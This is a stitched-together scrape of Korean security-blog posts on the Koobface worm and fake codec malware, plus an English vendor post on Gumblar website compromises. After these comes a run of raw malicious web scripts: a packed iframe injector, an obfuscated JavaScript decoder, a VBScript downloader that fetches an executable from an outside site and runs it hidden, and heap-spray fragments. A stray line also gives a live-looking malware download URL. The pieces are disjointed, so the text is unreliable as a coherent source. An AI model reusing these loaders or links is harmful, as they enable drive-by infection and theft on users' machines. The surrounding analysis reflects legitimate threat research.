과연 어떤 형태의 악성코드들이 판을 칠까요?
최근에 koobface 관련된 웜이나 벌새님 블로그에 있는 글(http://hummingbird.tistory.com/1573)에 나온 가짜 백신이나
코덱으로 위장(?)한 놈들인데요...
내년엔 코덱이 대세를 이룰까요??
걍 쓸때 없는 생각해봤습니다.
여러분들 생각은 어떠세요?
^^;;
#BLACKLABEL RESET UPDATE|http://inartdesigns.com/.sys/?getexe=ms.24.exe EXIT MD5|9f0c7d4916360cd4bc489270f5d62087 |
#BLACKLABEL |
오늘 아침 아래 글을 보았습니다.
http://blog.ahnlab.com/asec/176?TSSESSIONblogahnlabcom=67765c093a27d0b62777426c78d3e4c4
이슈가 된지 오래되었는데 이전에 나왔던 koobface와 약간 다른 양상을 보인다고 하는군요..
유튜브(YouTube) 동영상 관련 코덱으로 위장해서 전파가 되고 있었고
동영상을 클릭하면 Flash Player 10.37을 설치하라고 하면서 Setup.exe 파일을 다운로드해서 실행한다고 합니다.
일단 감염이 되면 system32 폴더에 ld15.exe 파일을 생성합니다.
이번건이 변종이라고 해서 예전에 나왔던 샘플을 구해봤습니다.
꽤 많더군요..(20개 -_-;;)
일단 앞뒤 안보고 전부 실행해봤습니다.
파일들이 많이 생기더군요..
이번건와 다른점은 system32 폴더가 아닌 C:\WINDOWS 폴더에 파일들을 생성하고 있었습니다.
좀 더 검색을 해보니 트렌드마이크로에 좋은 분석 자료들이 있더군요..
일단 koobface 웜의 동작도(?)부터 보시죠..
[클릭해서 크게보세요]
원문 : http://blog.trendmicro.com/the-real-face-of-koobface/
참 대단한 녀석이군....이라는 생각이 들었습니다.
시간나면 확보된 샘플들 하나씩 분석해봐야겠습니다.
(과연....가짜 rar이나 마무리 지어라...-_-;;;;)
마지막으로 트렌드마이크로에서 가져온 koobface 분석보고서입니다.
상당히 자세하게 작성되어 있는 좋은 자료로 보여 첨부합니다.
[참고 블로그]
http://hummingbird.tistory.com/1049
http://viruslab.tistory.com/689
http://blog.ahnlab.com/asec/162 [추가]
Posted by John Kuhn and Ryan McNulty with a little help from Holly Stewart on October 19, 2009 at 4:12 PM EDT.
Gumblar is back, and it has an upgraded arsenal of exploits to compromise your browser, Office, and Adobe® products.
Here in Managed Security Services, we’ve noticed a considerable elevation in our global hits on malicious PDF files. More specifically, the signature used to detect the latest Adobe Reader Remote Code Execution has picked up most of the activity. Here's a graph of the attacks we’re seeing:
The event count on Oct 19 ended at over a thousand events, five times the normal event count for this kind of malicious PDF and nearly doubling the kind of attack activity we've seen in the past.
Upon reviewing the data, it became very apparent that the sites hosting the malicious files were legitimate websites (privately owned and operated). All of these websites have been compromised and are now indiscriminately serving the malicious payload to countless victims.
In the past, Gumblar has been known to use stolen FTP password credentials to compromise their victim’s websites. We can only guess that these compromises were no different. As website visitors get infected, they (unknowingly) are farmed for any FTP credentials, seemingly providing the Gumblar controllers with an endless supply of future websites they can compromise.
So what’s different this time around? In previous versions of Gumblar, the malicious scripts and payload were hosted on a remote server. Iframe code was injected into the compromised website, and it redirected visitors to their rogue server (gumblar.cn). This time around, they are placing the malicious scripts and payload directly on the compromised host, which gives them a decentralized and redundant attack vector, spread across thousands of legitimate websites around the world.
The uploaded scripts are placed carefully to match existing file structures currently on the websites. Heavy obfuscation is used in an attempt to evade some existing security measures.
Here's a snippet of the obfuscated malicious script:
Some of the attack vectors have also changed. Today, we see the following exploits in play:
All of these attacks are very recent and effective at compromising the client side victim in an effort to propagate their malicious payload worldwide. Coverage for the updated Trojan is still very low according to an analysis done through VirusTotal.
Your best means of protection is to use protections provided by your IPS/IDS device and to apply the latest patches for all of the affected applications, if you haven’t already done so.
Gumblar is a force to be reckoned with, and this latest push of theirs is a true testament to that fact. As always, we’ll do our best to keep you informed of its changes and activities here.
Change History
Tue, Oct 20, 2009: Updated the chart to reflect the event count total at the end of Monday.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7.8("<1 5=4://2.3.6.9/d./e.c b=0 a=0></1>");',15,15,'|iframe|xxx|yyy|http|src||document|write|zzz|height|width|asp|t|Main'.split('|'),0,{})) |
<SCRIPT> document.write("<iframe width=50 height=0 src=ad.htm></iframe>"); document.write("<iframe width=100 height=0 src=index.htm></iframe>"); window.status="供냥"; window.onerror=function(){return true;} </SCRIPT> </HEAD> </HTML> |
<script type="text/jscript"> function init() { document.write(""); } window.onload = init; </script> <script> var a1 = "ABCDEFG"; var a2 = "HIJKLMNOP"; var a3 = "QRSTUVWXYZabcdef"; var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"="; function mydata(input){ var output=""; var chr1,chr2,chr3=""; var enc1,enc2,enc3,enc4=""; var i=0; var base64test=/[^A-Za-z0-9\+\/\=]/g; input=input.replace(/[^A-Za-z0-9\+\/\=]/g,""); do{ enc1=keyStrs.indexOf(input.charAt(i++)); enc2=keyStrs.indexOf(input.charAt(i++)); enc3=keyStrs.indexOf(input.charAt(i++)); enc4=keyStrs.indexOf(input.charAt(i++)); chr1=(enc1<<2)|(enc2>>4); chr2=((enc2&15)<<4)|(enc3>>2); chr3=((enc3&3)<<6)|enc4; output=output+String.fromCharCode(chr1); if(enc3!=64){output=output+String.fromCharCode(chr2);}; if(enc4!=64){output=output+String.fromCharCode(chr3);}; chr1=chr2=chr3=""; enc1=enc2=enc3=enc4=""; }; while(i<input.length);return output; }; t="43 + 37 ,107 - 36 ,9880 / 95 ,64 - 16 ,117 - 19 ,141 - 54 ,8211 / 69 ,9 + 34 ,884 / 13 ,97 - 16 ,153 - 42 ,38 + 18 ,75 + 24 ,350 / 7 ,5772 / 74 ,2057 / 17 ,0 + 97 ,70 + 18 ,3498 / 53 ,3 + 45 ,3358 / 46 ,16 + 55 ,137 - 17 ,90 + 14 ,174 - 76 ,153 - 44 ,167 - 67 ,1715 / 35 ,3204 / 36 ,4437 / 51 ,42 + 58 ,8856 / 82 ,51 + 29 ,3320 / 40 ,109 - 35 ,75 + 12 ,157 - 76 ,3348 / 31 ,113 - 35 ,64 + 42 ,172 - 73 ,4360 / 40 ,54 + 54 ,156 - 37 ,9200 / 92 ,1139 / 17 ,29 + 44 ,46 - 3 ,4420 / 65 ,72 + 9 ,6 + 106 ,179 - 61 ,1372 / 14 ,10395 / 99 ,52 + 14 ,196 - 88 ,... 중략 ...,13 + 90 ,51 + 39 ,10 + 99 ,102 - 49 ,187 - 83 ,1666 / 17 ,9 + 78 ,4760 / 56 ,30 + 90 ,94 - 18 ,670 / 10 ,102 - 29 ,4200 / 40 ,44 + 32 ,1675 / 25 ,56 + 17 ,111 - 6 ,30 + 46 ,4154 / 62 ,58 + 16 ,4720 / 40 ,94 + 5 ,83 - 12 ,4420 / 52 ,10185 / 97 ,3922 / 53 ,210 - 105 ,146 - 72 ,35 + 82 ,67 + 6 ,205 - 100 ,156 - 37 ,13447 / 113 ,4420 / 65 ,2754 / 34 ,174 - 63 ,1680 / 30 ,1 + 75 ,816 / 16 ,31 + 47 ,152 - 46 ,127 - 28 ,65 + 44 ,195 - 87 ,195 - 76 ,1700 / 17 ,55 + 13 ,22 + 30 ,84 - 23 "; t=eval("mydata(String.fromCharCode("+t+"))"); document.write(t); </script> |
<html> <script language="VBScript"> on error resume next dl = "http://www.xxxxxxxx.co.kr/data/msn.exe" Set df = document.createElement("ob"&"ject") df.setAttribute "classid", "clsid:BD96C55"&"6-65A3-11D0-983A-00C04FC29E36" str="Microsoft"&".XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str"&"ea" str1=a1&a2&a3 str5=str1 set S = df.createobject(str5&"m","") S.type = 1 str6="G"&"ET" x.Open str6, dl, False x.Send fname1="g0ld"&".com" set F = df.createobject("Scripti"&"ng.FilesystemObject","") set tmp = F.GetSpecialFolder(2) S.open fname1= F.BuildPath(tmp,fname1) S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Ap"&"plication","") Q.ShellExecute fname1,"","","ope"&"n",0 </script> |
<html> <body> <div id="DivID"> <script src='he1.swf'></script> <script src='he3.swf'> </script> <script src='he2.swf'></script> </body> </html> |
var XXXxxyt='0'; var slacksace=headersize+ytshell.length; while(omybro.length<slacksace) |
Global Header |
Packet Header |
Packet Data |
Packet Header |
Packet Data |
Packet Header |
Packet Data |
... |